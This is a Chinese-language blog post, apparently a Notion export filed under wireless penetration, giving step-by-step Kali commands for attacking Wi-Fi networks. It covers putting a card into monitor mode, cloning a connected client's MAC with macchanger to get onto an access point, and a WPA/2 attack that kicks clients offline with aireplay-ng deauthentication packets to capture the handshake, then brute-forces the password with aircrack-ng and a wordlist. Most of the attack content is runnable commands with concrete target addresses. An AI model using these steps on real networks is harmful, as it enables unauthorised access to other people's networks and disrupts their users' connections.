type
Post
status
Published
date
May 11, 2023
slug
summary
tags
category
无线渗透
icon
password

初识无线网卡指令&&配置

00 Kali虚拟机连接网卡

notion image

01 iwconfig 查看网卡名称

网卡名称:wlan0
notion image

02 关停不兼容进程

airmon-ng check kill
notion image
回显空白:无不兼容进程。 回显id值:自动kill掉不兼容进程,接下来执行03步骤即可。

03 网卡设置为侦听模式

 
airmon-ng start wlan0
notion image
侦听模式启动成功: (mac80211 monitor mode already enabled for [phy3]wlan0 on [phy3]wlan0)
 

04 过程参数解析

 
 

基于MAC身份伪造攻击

00 网卡设置侦听模式

airmon-ng check kill
airmon-ng start wlan0

01 网卡设置抓包模式

-c 1:指定无线ap的通信信道。
airodump-ng wlan0
notion image
airodump-ng wlan0 -c 1 --bssid E4:AA:5D:6F:CF:51
notion image
已连接无线AP的客户端:EC:2E:98:3B:11:63

02 修改物理机MAC地址实现身份伪造

PA1:先关闭无线网卡 ifconfig wlan0 down PA2:修改mac地址 macchanger -m EC:2E:98:3B:11:63 wlan0 PA3:开启无线网卡 ifconfig wlan0 up PA3:查看mac地址是否修改成功。 ifconfig wlan0
macchanger -m EC:2E:98:3B:11:63 wlan0
notion image
notion image

04 连接AP获取内网ip地址

到kali的设置,手动连接ap,并设置MAC地址:
notion image
notion image

05 内网探测

notion image
PS:AP有两台相同MAC的STA,所以hacker机器发送数据包时,会出现丢包的(网速差)
 

无线AP的WPA/2协议攻击

00 网卡设置侦听模式

airmon-ng check kill
airmon-ng start wlan0

01 扫描存活的无线AP

iwconfig:查询网卡名称,wlan0则是网卡名称。
airodump-ng wlan0
notion image

02 抓取无线AP的握手包

--bssid:指定想要攻击的无线AP的MAC地址。 -w:握手包保存的目录和名称。
airodump-ng --bssid 38:A4:ED:B4:EE:90 wlan0 -c 1 -w ./Xs_MI
notion image
已连接ap的客户端有:E0:89:7E:36:B2:2A

03 攻击客户端获取握手包

-0 2:发送2个攻击包 -a:指定无线AP的MAC地址 -c:指定已经连接的客户端的MAC地址 wlan0:网卡名称 PA:将已连接客户端踢下线,然后客户端一般会自动连接AP,而从我们可以抓取到握手包。 PS:抓取握手包窗口不关闭,在另外窗口进行操作:
aireplay-ng -0 2 -a 38:A4:ED:B4:EE:90 -c E0:89:7E:36:B2:2A wlan0
notion image

04 成功获取握手包的提示

当出现”handshake“字样时,表示成功抓取到握手包。
notion image

05 使用握手包爆破AP密码

aircrack-ng -w ~/20220709/top6000.txt Xs_MI-01.cap
notion image
从入门到放弃-Oracle注入(完善中)Linux信息收集-内网渗透